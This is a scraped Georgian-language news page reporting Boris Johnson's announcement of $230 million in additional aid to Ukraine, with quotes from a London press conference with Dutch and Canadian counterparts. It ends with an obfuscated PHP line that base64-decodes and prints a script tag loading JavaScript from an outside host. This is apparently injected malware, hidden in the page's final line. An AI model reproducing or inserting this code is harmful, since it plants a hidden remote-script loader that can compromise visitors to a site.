celsiusi
ავერსი საქკაბელი
დიდი ბრიტანეთის პრემიერ - მინისტრმა ბორის ჯონსონმა უკრაინისთვის 230 მილიონი დოლარის ოდენობით დამატებითი დახმარების შესახებ განაცხადა.
 
„დადგა მომენტი, როდესაც უკრაინის მეგობრებმა უნდა შექმნან ჰუმანიტარული, ეკონომიკური და თავდაცვითი სამხედრო მხარდაჭერის კოალიცია იმის გარანტირებისთვის, რომ პუტინი წარუმატებლობას განიცდის ამ კატასტროფულ შეჭრაში“, - განაცხადა ჯონსონმა დღეს, ნიდერლანდელ და კანადელ კოლეგებთან ლონდონში ერთობლივ პრესკონფერენციაზე სიტყვით გამოსვლისას.
 
მისივე თქმით, დიდი ბრიტანეთი, კანადა და ნიდერლანდები მხარდამხარ დგანან რუსეთის უკრაინაში შეჭრის წინააღმდეგ.
 
„უკრაინის მხარდაჭერის ჩვენი ახალი საერთაშორისო ჯგუფი კოორდინაციას გაუწევს საერთაშორისო საზოგადოების ძალისხმევას ხანგრძლივი და უცვლელი დახმარების გასაწევად ახლაც და მომავალშიც და სხვა ქვეყნებსაც მოვუწოდებთ, რომ შემოგვიერთდნენ“, - განაცხადა ჯონსონმა.
 
მისი თქმით, უკრაინაში რუსეთის შეჭრის 12 დღის განმავლობაში აშკარა გახდა, რომ რუსეთის პრეზიდენტმა ვლადიმერ პუტინმა შეცდომა დაუშვა.
 
„მან სათანადოდ ვერ შეაფასა უკრაინელები და მათი გმირული წინაღმდეგობა. მან ვერ შეაფასა მათი ლიდერის და დასავლეთის ერთიანობა“ ,- განაცხადა ბორის ჯონსონმა.
1028
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");